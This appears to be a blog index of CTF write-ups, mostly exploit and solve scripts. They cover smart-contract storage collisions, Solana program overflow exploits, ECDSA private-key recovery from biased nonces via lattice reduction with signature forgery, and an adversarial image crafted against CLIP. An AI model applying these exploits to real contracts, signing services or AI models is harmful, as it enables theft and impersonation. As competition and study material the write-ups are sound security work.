gss1

hitcon 2025 - web3

gss1 — Sun, 24 Aug 2025 23:50:15 +0900

solve.sol
https://gist.github.com/kangsangsoo/4201acc4ff776ada145df401f17f16b9

solve.sh
https://gist.github.com/kangsangsoo/2065afa98fc35e25e408ec30e05377c9

codegate 2025 final blockchain - dex

gss1 — Fri, 11 Jul 2025 18:44:12 +0900

solve.py
https://gist.github.com/kangsangsoo/43782c347e0a39b393e13013b55dc9cd

solve.sol
https://gist.github.com/kangsangsoo/767688265f19d9650a7ae937659110ff

codegate 2025 quals - ai

gss1 — Sun, 30 Mar 2025 14:26:05 +0900

bright

import torch
import clip
import numpy as np
from PIL import Image

device = "cuda" if torch.cuda.is_available() else "cpu"

# 1. CLIP 모델 로드
model, preprocess = clip.load("ViT-B/32", device=device)
model.eval()

# 2. 타겟 이미지 로딩
target_image = Image.open("oiia.png").convert("RGB")
target_tensor = preprocess(target_image).unsqueeze(0).to(device)

with torch.no_grad():
    target_features = model.encode_image(target_tensor)
    target_features = target_features / target_features.norm(dim=-1, keepdim=True)

target_features_np = target_features[0].detach().cpu().numpy().astype(np.float64)
target_features_np /= np.linalg.norm(target_features_np)

# 3. 초기 이미지 (흰색)
initial_image = torch.full((1, 3, 224, 224), 1.0, requires_grad=True, device=device)

# 4. Normalize 함수
def normalize_for_clip(img_tensor):
    mean = torch.tensor([0.48145466, 0.4578275, 0.40821073], device=img_tensor.device).view(1, 3, 1, 1)
    std  = torch.tensor([0.26862954, 0.26130258, 0.27577711], device=img_tensor.device).view(1, 3, 1, 1)
    return (img_tensor - mean) / std

# 5. 최적화 설정
optimizer = torch.optim.Adam([initial_image], lr=6e-3)
num_iterations = 5000
best_similarity = -1.0
best_img = None

# 6. 학습 루프
for step in range(num_iterations):
    img_clamped = torch.clamp(initial_image, 0.0, 1.0)
    normalized_img = normalize_for_clip(img_clamped)

    current_features = model.encode_image(normalized_img)
    current_features = current_features / current_features.norm(dim=-1, keepdim=True)

    # torch 유사도 (gradient 유지)
    similarity = (current_features * target_features).sum()
    loss = -similarity  # 밝기 페널티 없이 원래 방식대로

    optimizer.zero_grad()
    loss.backward()
    optimizer.step()

    # 하드하게 밝기 유지
    with torch.no_grad():
        if initial_image.mean() < 0.98:
            diff = 0.98 - initial_image.mean()
            initial_image += diff

    # 평가용 np 유사도
    feat_np = current_features[0].detach().cpu().numpy().astype(np.float64)
    feat_np /= np.linalg.norm(feat_np)
    true_similarity = np.dot(feat_np, target_features_np)

    if true_similarity > best_similarity:
        best_similarity = true_similarity
        best_img = img_clamped.detach().clone()

    if step % 50 == 0 or step == num_iterations - 1:
        print(f"Step {step}/{num_iterations}, np_sim={true_similarity:.6f}, torch_sim={similarity.item():.6f}, mean={img_clamped.mean().item() * 255:.2f}")

    if true_similarity >= 0.99999:
        print(f"\n✅ Reached similarity {true_similarity:.6f} at step {step}")
        break

# 7. 후처리 및 저장
if best_img is None:
    best_img = torch.clamp(initial_image, 0.0, 1.0).detach()

final_img_np = best_img[0].cpu().numpy() * 255
final_img_np = np.moveaxis(final_img_np, 0, -1)
mean_val = final_img_np.mean()

if mean_val < 250:
    scale_factor = 250.0 / mean_val
    final_img_np = np.clip(final_img_np * scale_factor, 0, 255)

final_img = Image.fromarray(final_img_np.astype(np.uint8))
final_img.save("adversarial_scaled.png", format="PNG", compress_level=0)

print(f"\n  Final similarity: {best_similarity:.6f}")
print(f"  Final mean pixel: {final_img_np.mean():.2f}")
print("✅ Saved to: adversarial_scaled.png")

rotceteD TPG

https://gist.github.com/kangsangsoo/8ae40743dac7a4c9af4ac4f05e6ee60c


import itertools
from Crypto.Cipher import AES
from multiprocessing import Pool, cpu_count
from math import comb
import os

# cands 세팅
cand = ['000.txt', '001.txt', '002.txt', '003.txt', '004.txt', '006.txt', '008.txt', '009.txt', '010.txt', '011.txt', '013.txt', '014.txt', '018.txt', '019.txt', '022.txt', '023.txt', '025.txt', '026.txt', '028.txt', '029.txt', '030.txt', '031.txt', '033.txt', '035.txt', '037.txt', '038.txt', '040.txt', '041.txt', '043.txt', '044.txt', '045.txt', '047.txt', '051.txt', '054.txt', '055.txt', '056.txt', '057.txt', '058.txt', '060.txt', '061.txt', '063.txt', '064.txt', '065.txt', '067.txt', '075.txt', '077.txt', '079.txt', '083.txt', '084.txt', '085.txt', '089.txt', '092.txt', '097.txt', '098.txt', '100.txt', '104.txt', '106.txt', '110.txt', '112.txt', '113.txt', '114.txt', '119.txt', '120.txt', '122.txt', '123.txt', '124.txt', '125.txt', '126.txt', '127.txt']
cands = [int(x.split('.')[0]) for x in cand]

# AES 세팅
nonce = bytes.fromhex('3d6b85f9299442b2219a44aee1345e16')
ciphertext = bytes.fromhex('c88f0e97fbe289c7800a68c2aae64a1825e0405cca87f6360e5f194e43978e1772f09a5bd2812cf9db8cf9008be7e34222ed9ee22bf6188358a49ada4e6d5ae16e71b0807d414f')
tag = bytes.fromhex('c58e546b2fed995d0a6a723c8f10f6d1')

# 개별 조합을 받아서 복호화 시도
def try_decrypt(combo):
    key = 0
    combos = []
    for i in combo:
        combos.append(cands[i])
    for i in combos:
        assert i in cands
    assert len(set(combos)) == 64
    for j in range(128):
        key *= 2
        if j in combos:
            key = key + 1
    key_bytes = key.to_bytes(16, byteorder='big')

    cipher = AES.new(key_bytes, AES.MODE_GCM, nonce=nonce)
    try:
        plaintext = cipher.decrypt_and_verify(ciphertext, tag)
        return plaintext  # 성공 시 리턴
    except:
        return None
    
from tqdm import tqdm
from itertools import combinations

if __name__ == '__main__':
    from tqdm import tqdm

    num_workers = cpu_count()
    print(f"[*] Using {num_workers} CPU cores.")

    numbers = list(range(len(cands)))  
    all_combos = itertools.combinations(numbers, 64)  

    

    with Pool(num_workers) as pool:
        for result in tqdm(pool.imap_unordered(try_decrypt, all_combos), total=comb(len(cands), 64), desc="Brute-forcing"):
            if result:
                print("\n[✓] 복호화 성공:", result.decode(errors='ignore'))
                pool.terminate()  # 성공 시 다른 프로세스 종료
                break

hxp 38C3 CTF - respectable_nft

gss1 — Mon, 30 Dec 2024 05:00:57 +0900

Find a storage collision!

The mapping(uint256 => string) public FlagNames is stored in slot 6. To brute-force it, focus on cases where the string length is 32 or greater.

When the ID is 56488061, the implementation slot of proxy is 141 slots apart.

from Crypto.Hash import keccak
from tqdm import tqdm

def compute_flagnames_length_slot(key: int, base_slot: int = 0) -> str:
    key_bytes = key.to_bytes(32, byteorder='big')
    slot_bytes = base_slot.to_bytes(32, byteorder='big')

    hasher = keccak.new(digest_bits=256)
    hasher.update(key_bytes + slot_bytes)
    length_slot_hex = "0x" + hasher.hexdigest()
    return length_slot_hex

def compute_data_slot(length_slot_hex: str, offset: int = 0) -> str:
    length_slot_no_0x = length_slot_hex[2:]  
    length_slot_bytes = bytes.fromhex(length_slot_no_0x)

    hasher2 = keccak.new(digest_bits=256)
    hasher2.update(length_slot_bytes)
    data_offset_hex = "0x" + hasher2.hexdigest()
    return data_offset_hex


target_hashes_hex = [
    "0x6ec82d6c1818e9fe1ca828d3577e9b2dadd8d4720dd58701606af804c069cfcb",
    "0xb6753470eb6d4b1c922b6fc73d6f139c74e8cf70d68951794272d43bed766bd6"
]
target_hashes_int = [int(h, 16) for h in target_hashes_hex]

def is_within_tolerance(slot_hex: str, targets: list[int], tolerance: int = 1000) -> bool:
    slot_val = int(slot_hex, 16)
    for t in targets:
        if abs(slot_val - t) <= tolerance:
            return True
    return False

def main():
    for i in [6]:
        print(f"[+] Starting search for i={i}")
        for j in tqdm(range(0, 100000000), desc=f"i={i}"):
            length_slot_hex = compute_flagnames_length_slot(j, i)
            data_slot_hex = compute_data_slot(length_slot_hex, offset=0)

            if is_within_tolerance(data_slot_hex, target_hashes_int, tolerance=10000):
                print(f"Found! i={i}, j={j}, data_slot={data_slot_hex}")
                break

if __name__ == "__main__":
    main()

contract Solve {
    Setup public setup;
    CryptoFlags public cryptoFlags;

    constructor(address _setup){
        setup = Setup(_setup);
        cryptoFlags = CryptoFlags(setup.cryptoFlags());
    }

    function solve(bytes memory answer) public {
        cryptoFlags.claimFlag(56488061);
        cryptoFlags.setFlagName(56488061, string(answer));
    }

    function isSolved() external pure returns (bool) {
        return true;
    }
}

import json
from web3 import Web3
from solc import compile_source
from Crypto.Util.number import *
w3 = Web3(Web3.HTTPProvider("http://10.244.0.1:8545"))

#Check Connection
t=w3.is_connected()
print(t)

# Get env
prikey = '0x4ca9a10b1f99cba18cb244c1737286e59f2da53b71d535126b3db6de3d0cead3'

# Create a signer wallet
PA=w3.eth.account.from_key(prikey)
Public_Address=PA.address
myAddr = Public_Address

SETUP = "0x2d2174DA255968410293bc12bb6cCa11905b8eD0"

def solve_deploy():
    f = open("solve.abi", "r"); contract_abi= f.read(); f.close()
    f = open("solve.bin", "r"); contract_bytecode= f.read(); f.close()

    contract = w3.eth.contract(abi=contract_abi, bytecode=contract_bytecode)
    transaction = contract.constructor(SETUP).build_transaction(
        {
            "chainId": w3.eth.chain_id,
            "gasPrice": w3.eth.gas_price,
            "from": Public_Address,
            "nonce": w3.eth.get_transaction_count(Public_Address),
        }
    )
    sign_transaction = w3.eth.account.sign_transaction(transaction, private_key=prikey)
    print("Deploying Contract!")
    # Send the transaction
    transaction_hash = w3.eth.send_raw_transaction(sign_transaction.rawTransaction)
    # Wait for the transaction to be mined, and get the transaction receipt
    print("Waiting for transaction to finish...")
    transaction_receipt = w3.eth.wait_for_transaction_receipt(transaction_hash)
    print(transaction_receipt)
    print(f"Done! Contract deployed to {transaction_receipt.contractAddress}")
    return str(transaction_receipt.contractAddress)

def solve():
    f = open('solve.abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=SOLVE, abi=abi)
    addr = b"\x00" * 12 + long_to_bytes(int(SOLVE, 16))
    func_call = contract.functions["solve"](addr * 150).build_transaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id
    })

    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

SOLVE = solve_deploy()
solve()

lakectf 2025 qual - silly, hopfield

gss1 — Sun, 8 Dec 2024 22:58:40 +0900

hopfield

import numpy as np
from PIL import Image
import os

# 모델 로드
data = np.load('model.npz')
W = data['W']  # (N, N)
v0 = data['v0']  # (N, N)
N = W.shape[0]

def analyze_hopfield_weights(W):
    # Perform eigen decomposition
    eigenvalues, eigenvectors = np.linalg.eigh(W)
    
    # Threshold eigenvectors to recover patterns
    recovered_patterns = np.sign(eigenvectors)

    
    return recovered_patterns, eigenvalues, eigenvectors

def recover_patterns_from_eigenvectors(eigenvalues, eigenvectors, threshold=0):
    # Select eigenvectors with eigenvalues greater than the threshold
    significant_indices = np.where(eigenvalues > threshold)[0]
    significant_eigenvectors = eigenvectors[:, significant_indices]
    
    # Binarize (threshold) the eigenvectors to obtain patterns
    recovered_patterns = np.sign(significant_eigenvectors)
    
    return recovered_patterns.T 

def pattern_to_image(pattern, image_shape):
    # Map -1, 1 to 0, 255
    image = (pattern + 1) * 127.5  # -1 -> 0, +1 -> 255
    image = image.reshape(image_shape).astype(np.uint8)
    return image

def save_pattern_as_image(pattern, image_shape, file_path):
    # Map -1, 1 to 0, 255 and reshape
    image = (pattern + 1) * 127.5  # -1 -> 0, +1 -> 255
    image = image.reshape(image_shape).astype(np.uint8)
    
    # Convert to PIL Image and save
    img = Image.fromarray(image)
    img.save(file_path)

recovered_patterns, eigenvalues, eigenvectors = analyze_hopfield_weights(W)
recovered_patterns = recover_patterns_from_eigenvectors(eigenvalues, eigenvectors)
os.makedirs("gggg", exist_ok=True)
for i in range(len(recovered_patterns)):
    save_pattern_as_image(recovered_patterns[i], (10, 120), "gggg/" + str(i) + ".png")

Silly Project #1

1. change first stdin

2. re-proof that

use base64::Engine;
use sp1_sdk::ProverClient;
use std::fs::File;
use std::io::Write;

pub const ELF: &[u8] = include_bytes!("../../../elf/silly-project-1-program");

fn main() {
    let client = ProverClient::new();
    let (pk, vk) = client.setup(ELF);
    println!("Prove it!");
    let mut proof: sp1_sdk::SP1ProofWithPublicValues = bincode::deserialize(
        &base64::prelude::BASE64_STANDARD
            .decode(
                &std::io::stdin()
                    .lines()
                    .next()
                    .expect("No line")
                    .expect("No line")[..],
            )
            .expect("base64"),
    )
    .expect("Proof format");
    proof.stdin.buffer[0][0] = 1;
    let mut my_proof= client.prove(&pk, proof.stdin.clone()).run();
    my_proof.unwrap().save("mymy.proof");
}

uniswap v3: the range of sqrtPriceX96

gss1 — Mon, 18 Nov 2024 03:00:41 +0900

It's very interesting to find the reasoning behind each line of code, especially in Uniswap, which has been forked hundreds of times. I feel that understanding Uniswap v3, where the tick concept was introduced, is much more difficult than understanding v2. I aim to understand everything about v3 on my own and organize it into a blog post.

The topic is why it's < instead of <= in thie code.

uniswap v3: the range of sqrtPriceLimitX96

gss1 — Mon, 18 Nov 2024 02:55:55 +0900

The topic is why it’s <, > instead of <=, >= in this code.

2024 Blaz CTF - solana challs

gss1 — Tue, 8 Oct 2024 22:58:55 +0900

I participated in BlazCTF with KimchiPremium.

There were two solana challenges like pwnable.

safusol

#![cfg(not(feature = "no-entrypoint"))]

use std::ops::Deref;

use solana_program::declare_id;
use solana_program::account_info::next_account_info;
use solana_program::program::invoke;

use solana_program::{
    account_info::AccountInfo,
    entrypoint,
    entrypoint::ProgramResult,
    instruction::{AccountMeta, Instruction},
    pubkey::Pubkey,
    msg,
};
use std::rc::Rc;


declare_id!("FuzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzLand");

const INIT: u32 = 0xe1c7392a;
const REGISTER: u32 = 0x1aa3a008;
const DEPOSIT: u32 = 0xb6b55f25;
const WITHDRAW: u32 = 0x2e1a7d4d;
const TOGGLE: u32 = 0x40a3d246;


use std::mem;
use std::slice;

// Rust에서 C 구조체와 동일한 구조체 정의
#[repr(C, packed)]
struct Calldata {
    selector: u32,
    bump: u8,
}


// C 구조체를 Vec<u8>으로 변환하는 함수
fn struct_to_vec(input: &Calldata) -> Vec<u8> {
    let base_size = mem::size_of::<Calldata>();
    let total_size = base_size;

    let mut buffer: Vec<u8> = Vec::with_capacity(total_size);

    let input_slice = unsafe {
        slice::from_raw_parts(
            input as *const Calldata as *const u8,
            base_size
        )
    };
    buffer.extend_from_slice(input_slice);

    buffer
}


entrypoint!(process_instruction);
    fn process_instruction(
        program_id: &Pubkey,
        accounts: &[AccountInfo],
        instruction_data: &[u8],
    ) -> ProgramResult {

        let account_iter = &mut accounts.iter();
        let user = next_account_info(account_iter)?;
        let program = next_account_info(account_iter)?;
        let system_program = next_account_info(account_iter)?;
        let config_account = next_account_info(account_iter)?;
        let vault_account = next_account_info(account_iter)?;
        let balance_account = next_account_info(account_iter)?;
        

        let (config_addr, config_bump) = Pubkey::find_program_address(&["CONFIG".as_bytes()], &program.key);
        let (vault_addr, vault_bump) = Pubkey::find_program_address(&["VAULT".as_bytes()], &program.key);
        let (balance_addr, balance_bump) = Pubkey::find_program_address(&["BALANCE".as_bytes(), &user.key.to_bytes()], &program.key);


        {

            let input = Calldata {
                selector: REGISTER,
                bump: balance_bump,
            };
        
            let cont = struct_to_vec(&input);

            let register = Instruction::new_with_bytes(
                program.key.clone(),
                &cont,
                vec![
                    AccountMeta::new(user.key.clone(), true),
                    AccountMeta::new(vault_account.key.clone(), false),
                    AccountMeta::new(balance_account.key.clone(), false),
                    AccountMeta::new_readonly(program.key.clone(), false),
                    AccountMeta::new_readonly(system_program.key.clone(), false),
                    AccountMeta::new(config_account.key.clone(), false),
                ],
            );
    
            invoke(&register, 
                &[
                    user.clone(),
                    vault_account.clone(),
                    balance_account.clone(),
                    program.clone(),
                    system_program.clone(),
                    config_account.clone(),
            ]);
        }

        {

            let input = Calldata {
                selector: WITHDRAW,
                bump: 0,
            };
        
            let mut cont = struct_to_vec(&input);
            
            let back = vec![148, 53, 119, 0, 0, 0, 0];
            cont.extend(back);

            let withdraw = Instruction::new_with_bytes(
                program.key.clone(),
                &cont,
                vec![
                    AccountMeta::new(user.key.clone(), true),
                    AccountMeta::new(vault_account.key.clone(), false),
                    AccountMeta::new(balance_account.key.clone(), false),
                    AccountMeta::new_readonly(program.key.clone(), false),
                    AccountMeta::new_readonly(system_program.key.clone(), false),
                    AccountMeta::new(balance_account.key.clone(), false),
                ],
            );
    
            invoke(&withdraw, 
                &[
                    user.clone(),
                    vault_account.clone(),
                    balance_account.clone(),
                    program.clone(),
                    system_program.clone(),
                    config_account.clone(),
            ]);
        }

        Ok(())        
    }

# sample solve script to interface with the server
import pwn
from pwn import *
context.log_level = 'debug'

# if you don't know what this is doing, look at server code and also sol-ctf-framework read_instruction:
# https://github.com/otter-sec/sol-ctf-framework/blob/rewrite-v2/src/lib.rs#L237
# feel free to change the accounts and ix data etc. to whatever you want
account_metas = [
    ("user",           "sw"), # signer + writable
    ("program",        "-r"), # read only
    ("system program", "-r"), # read only
    ("config_account", "w"), 
    ("vault_account",  "w"),
    ("balance_account","w"), 
]

# local

# HOST = "127.0.0.1"
# PORT = 31337
# p = pwn.remote(HOST, PORT)

# remote

HOST = "safusol.chal.ctf.so"
PORT = 1337
p = remote(HOST, PORT)
print(p.recvuntil("Solution? "))
p.sendline(input())

pause()

with open("./my_solve/target/deploy/my_solve.so", "rb") as f:
    solve = f.read()
sleep(1)
p.sendlineafter(b"program pubkey: \n", b"FuzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzLand", timeout=100)
sleep(1)
p.sendlineafter(b": \n", str(len(solve)).encode(), timeout=100)
p.send(solve)

accounts = {
    "system program": "11111111111111111111111111111111",
}

from solders.pubkey import Pubkey
import base58





for l in p.recvuntil(b"num accounts: \n", drop=True).strip().split(b"\n"):
    [name, pubkey] = l.decode().split(": ")
    accounts[name] = pubkey


CONFIG_SEED = b"CONFIG"
VAULT_SEED = b"VAULT"
BALANCE_SEED = b"BALANCE"

new_acct = Pubkey([0] * 31 + [0])
data_account, _ = new_acct.find_program_address(
    seeds=[CONFIG_SEED],
    program_id=Pubkey(list(base58.b58decode(accounts['program']))),
)
accounts["config_account"] = data_account

new_acct = Pubkey([0] * 31 + [0])
data_account, _ = new_acct.find_program_address(
    seeds=[VAULT_SEED],
    program_id=Pubkey(list(base58.b58decode(accounts['program']))),
)
accounts["vault_account"] = data_account

new_acct = Pubkey([0] * 31 + [0])
data_account, _ = new_acct.find_program_address(
    seeds=[BALANCE_SEED, base58.b58decode(accounts['user'])],
    program_id=Pubkey(list(base58.b58decode(accounts['program']))),
)
accounts["balance_account"] = data_account


instruction_data = b""

p.sendline(str(len(account_metas)).encode())
for name, perms in account_metas:
    p.sendline(f"{perms} {accounts[name]}".encode())

p.sendlineafter(b"ix len: \n", str(len(instruction_data)).encode())
p.send(instruction_data)

p.interactive()

solalloc

#![cfg(not(feature = "no-entrypoint"))]

use std::ops::Deref;

use solana_program::declare_id;
use solana_program::account_info::next_account_info;
use solana_program::program::invoke;

use solana_program::{
    account_info::AccountInfo,
    entrypoint,
    entrypoint::ProgramResult,
    instruction::{AccountMeta, Instruction},
    pubkey::Pubkey,
    msg,
};
use std::rc::Rc;


declare_id!("FuzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzLand");




use std::mem;
use std::slice;

// Rust에서 C 구조체와 동일한 구조체 정의
#[repr(C, packed)]
struct UserInput {
    bump: u8,
    input_type: u8,
    amount: u64,
    msg_size: u64,
    msg: [u8; 0], // C의 flexible array member를 흉내내기 위해 0 길이 배열 사용
}

// C 구조체를 Vec<u8>으로 변환하는 함수
fn struct_to_vec(input: &UserInput, message: &[u8]) -> Vec<u8> {
    // UserInput 구조체 크기 계산 (msg 제외)
    let base_size = mem::size_of::<UserInput>();
    // 전체 크기는 기본 구조체 크기 + 메시지 길이
    let total_size = base_size + message.len();

    // 빈 Vec<u8> 생성
    let mut buffer: Vec<u8> = Vec::with_capacity(total_size);

    // 구조체 포인터를 바이트 슬라이스로 변환하여 Vec에 추가
    let input_slice = unsafe {
        slice::from_raw_parts(
            input as *const UserInput as *const u8,
            base_size
        )
    };
    buffer.extend_from_slice(input_slice);

    // 메시지를 Vec에 추가
    buffer.extend_from_slice(message);

    buffer
}


entrypoint!(process_instruction);
    fn process_instruction(
        program_id: &Pubkey,
        accounts: &[AccountInfo],
        instruction_data: &[u8],
    ) -> ProgramResult {

        let account_iter = &mut accounts.iter();
        let user = next_account_info(account_iter)?;
        let program = next_account_info(account_iter)?;
        let system_program = next_account_info(account_iter)?;
        let admin = next_account_info(account_iter)?;
        let data_account = next_account_info(account_iter)?;
        
        {
            let mut start: Vec<u8> = vec![2];

            let (data_addr, data_bump) = Pubkey::find_program_address(&["BLAZ".as_bytes()], &program.key);

            let input = UserInput {
                bump: data_bump,
                input_type: 1, // deposit
                amount: 0,
                msg_size: 18446744069414584320 + 0xfe0 - 8 - 32, // (1u64 << 64) - 0x300000000 + 0x200000000,
                msg: [], // 메시지는 따로 처리할 것이므로 비워둠
            };
        
            let message: &[u8] = &[0]; 
        
            let mut cont1 = struct_to_vec(&input, message);





            let input = UserInput {
                bump: data_bump,
                input_type: 2, // withdraw
                amount: 2000000000,
                msg_size: 32, // (1u64 << 64) - 0x300000000 + 0x200000000,
                msg: [], // 메시지는 따로 처리할 것이므로 비워둠
            };
        
            let message: &[u8] = &[admin.key.to_bytes()[0]]; 
        
            // 구조체와 메시지를 Vec<u8>으로 변환
            let mut cont2 = struct_to_vec(&input, message);
            let inp = [start, cont1, cont2, admin.key.to_bytes()[1..].to_vec(), vec![0]].concat();
            
            
            
            // let inp = [start, cont1].concat();



            let register = Instruction::new_with_bytes(
                program.key.clone(),
                &inp,
                vec![
                    AccountMeta::new(user.key.clone(), true),
                    AccountMeta::new(data_account.key.clone(), false),
                    AccountMeta::new_readonly(program.key.clone(), false),
                    AccountMeta::new_readonly(system_program.key.clone(), false),
                ],
            );
    






            invoke(&register, 
                &[
                    user.clone(),
                    program.clone(),
                    system_program.clone(),
                    admin.clone(),
                    data_account.clone(),
            ]);
        }

        Ok(())        
    }

# sample solve script to interface with the server
import pwn

# if you don't know what this is doing, look at server code and also sol-ctf-framework read_instruction:
# https://github.com/otter-sec/sol-ctf-framework/blob/rewrite-v2/src/lib.rs#L237
# feel free to change the accounts and ix data etc. to whatever you want
account_metas = [
    ("user",           "sw"), # signer + writable
    ("program",        "-r"), # read only
    ("system program", "-r"), # read only
    ("admin",          "w"), 
    ("data_account", "w"),
]

# HOST = "localhost"
HOST = "solalloc.chal.ctf.so"
PORT = 1337
p = pwn.remote(HOST, PORT)

with open("my_solve/target/deploy/my_solve.so", "rb") as f:
    solve = f.read()

p.sendlineafter(b"program pubkey: \n", b"FuzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzLand")
p.sendlineafter(b"program len: \n", str(len(solve)).encode())
p.send(solve)

accounts = {
    "system program": "11111111111111111111111111111111",
}

for l in p.recvuntil(b"num accounts: \n", drop=True).strip().split(b"\n"):
    [name, pubkey] = l.decode().split(": ")
    accounts[name] = pubkey

from solders.pubkey import Pubkey
import base58

LIVE_BONUS_SEED = b"BLAZ"

new_acct = Pubkey([0] * 31 + [0])
data_account, _ = new_acct.find_program_address(
    seeds=[LIVE_BONUS_SEED],
    program_id=Pubkey(list(base58.b58decode(accounts['program']))),
)
accounts["data_account"] = data_account


instruction_data = b""

p.sendline(str(len(account_metas)).encode())
for name, perms in account_metas:
    p.sendline(f"{perms} {accounts[name]}".encode())

p.sendlineafter(b"ix len: \n", str(len(instruction_data)).encode())
p.send(instruction_data)

print(accounts)
print(account_metas)

p.interactive()

2024 codegate - sms

gss1 — Wed, 4 Sep 2024 01:47:52 +0900

pwn+crypto?

__import__("os").environ["TERM"] = "xterm-256color"


from pwn import *

from cryptography.hazmat.primitives.asymmetric.utils import decode_dss_signature, encode_dss_signature
from binascii import unhexlify, hexlify

import warnings
warnings.filterwarnings("ignore", category=BytesWarning)
# context.log_level = "debug"

# r = process("./chall")
r = remote("13.209.82.80", 5333)


def register(id, pw):
    r.sendlineafter("Enter choice: ", "1")
    r.sendlineafter("Enter name: ", id)
    r.sendlineafter("Enter role: ", "admin")
    r.sendlineafter("Enter password: ", pw)

def login(id, pw):
    r.sendlineafter("Enter choice: ", "2")
    r.sendlineafter("Enter name: ", id)
    r.sendlineafter("Enter password: ", pw)

def update_role(id, role):
    r.sendlineafter("Enter choice: ", "3")
    r.sendlineafter("Enter name: ", id)
    r.sendlineafter("Enter a new role: ", role)

def reset_password(pw):
    r.sendlineafter("Enter choice: ", "4")
    r.sendlineafter("Enter new password: ", pw)

def sig(msg):
    r.sendlineafter("Enter choice: ", "5")
    r.sendlineafter("Enter message: ", msg)
    r.recvuntil("Message: ")
    used_msg = r.recvline()[:-1]
    r.recvuntil("Sig: ")
    used_sig = r.recvline()[:-1]
    der_signature = unhexlify(used_sig)
    r_, s = decode_dss_signature(der_signature)
    # return used_msg, used_sig
    return r_, s

def reset_nonce():
    r.sendlineafter("Enter choice: ", str(0xdeadbeef))


list_r = []
list_s = []
list_hm = []

register(str(1), str(1)*2)
login(str(1), str(1)*2)
update_role("admin", "a" * 32)
login("admin", b"\x00")


import os

num = 150

for _ in range(num):
    reset_password("a"*32)
    m = os.urandom(8).hex().encode()
    r_, s_ = sig(m)
    reset_nonce()
    list_r.append(r_)
    list_s.append(s_)
    list_hm.append(int(hashlib.sha256(m).hexdigest(), 16))


from Crypto.Util.number import *

n = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
ln = len(list_r)
R = 2**248
A = Matrix(QQ, ln+2, ln+2)
for i in range(ln):
    r_ = list_r[i]
    s = list_s[i]
    hm = list_hm[i]
    tm = inverse(s, n) * r_
    am = -inverse(s, n) * hm
    A[i, i] = n
    A[ln, i] = tm
    A[ln+1, i] = am 

A[ln, ln] = R/n
A[ln+1, ln+1] = R



from ecdsa import NIST256p, ellipticcurve, numbertheory

# P-256 타원 곡선 설정
curve = NIST256p.curve
generator = NIST256p.generator
order = generator.order()

B = A.LLL()
for row in B:
    if row[-1] == R:
        d = int(row[-2] * n // R) % n
        print("개인키", d)
        print("개인키2", order - d)
        
        t = generator * d
        print("공개키", t.to_affine())


        t = generator * (order - d)
        print("공개키2", t.to_affine())

        d = order - d

        break

r.sendlineafter("Enter choice: ", str(6))
r.sendlineafter("Enter name: ", "admin")
pem_key = r.recvuntil("1.")[:-2]


from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.backends import default_backend
import base64
import gmpy2

# 공개키 로드
public_key = serialization.load_pem_public_key(pem_key, backend=default_backend())

# 공개키에서 숫자 좌표 추출
numbers = public_key.public_numbers()
Qx = numbers.x
Qy = numbers.y

print("공개키", Qx, Qy)

curve = NIST256p.curve
a = curve.a()
b = curve.b()
p = curve.p()

# 특정 x 값 설정
x = Qx

# y^2 계산
rhs = (pow(x, 3, p) + a * x + b) % p

# y 계산 (모듈로 p에서의 제곱근)
y1 = gmpy2.powmod(rhs, (p + 1) // 4, p)  # 양의 제곱근
y2 = (-y1) % p  # 음의 제곱근

# 결과 출력
print("x:", x)
print("y1:", y1)
print("y2:", y2)


from ecdsa import SigningKey, NIST256p, BadSignatureError


curve = NIST256p

# 개인키 생성 (개인키 d를 사용하여 생성)
# private_key = SigningKey.from_secret_exponent(d, curve=curve)

# 메시지 정의
message = b"SHOW ME THE FLAG"

# 메시지 서명 생성
# signature = private_key.sign(message)

# rr, ss = decode_dss_signature(signature)

# # r과 s 값을 DER 형식의 서명으로 인코딩
# signature_der = encode_dss_signature(rr, ss)

# # 서명을 16진수 문자열로 변환하여 출력
# signature_hex = signature_der.hex()
# print("DER 형식의 서명 (hex):", signature_hex)

z = int.from_bytes(hashlib.sha256(message).digest(), byteorder='big')

# # 랜덤 값 k 선택
k = 156165121

# # R 계산 (R = k * G)
R = k * generator

# # r 계산 (R의 x 좌표를 사용)
r_ = R.x() % order

from ecdsa import NIST256p, ellipticcurve, numbertheory

# k의 모듈러 역수 계산
k_inv = numbertheory.inverse_mod(k, order)

# s 계산
s_ = (k_inv * (z + r_ * d)) % order

r_ = int(r_)
s_ = int(s_)

# r과 s 출력
print("r:", r_)
print("s:", s_)


# public_key = private_key.get_verifying_key()
# print(public_key.verify(signature, message))

from ecdsa import SigningKey, NIST256p, util
# rr, ss = util.sigdecode_string(signature, private_key.curve.order)

print(f"r: {r_}")
print(f"s: {s_}")

sig_ = encode_dss_signature(r_, s_).hex()

assert r_, s_ == decode_dss_signature(sig_)

print(sig_)


r.sendlineafter("Enter choice: ", str(0x13371337))
r.sendlineafter("Enter MessageLen: ", str(len(message) + 1))
msg = message.hex() + "00"
r.recvuntil("Enter Message: ")
for i in range(0, len(msg), 2):
    r.sendline(msg[i:i+2])
r.sendlineafter("Enter sigLen: ", str(len(sig_)//2))
r.recvuntil("Enter sig: ")
for i in range(0, len(sig_), 2):
    r.sendline(sig_[i:i+2])

r.interactive()

SekaiCTF 2024 - solana

gss1 — Mon, 26 Aug 2024 10:14:00 +0900

import hashlib

keccak_hash = hashlib.sha256()

data = b"global:test_test" # testTest
data = b"global:claim_liveBonus" # claimLiveBonus
keccak_hash.update(data)

hash_result = keccak_hash.hexdigest()[:16]

hash_result = bytes.fromhex(hash_result)
hash_result = list(hash_result)
print(f"sha256 : {hash_result}")

'''
[211, 124, 67, 15, 211, 194, 178, 240]
[216, 121, 131, 75, 232, 154, 71, 25]
[213, 157, 193, 142, 228, 56, 248, 150]
[47, 3, 27, 97, 215, 236, 219, 144]
'''

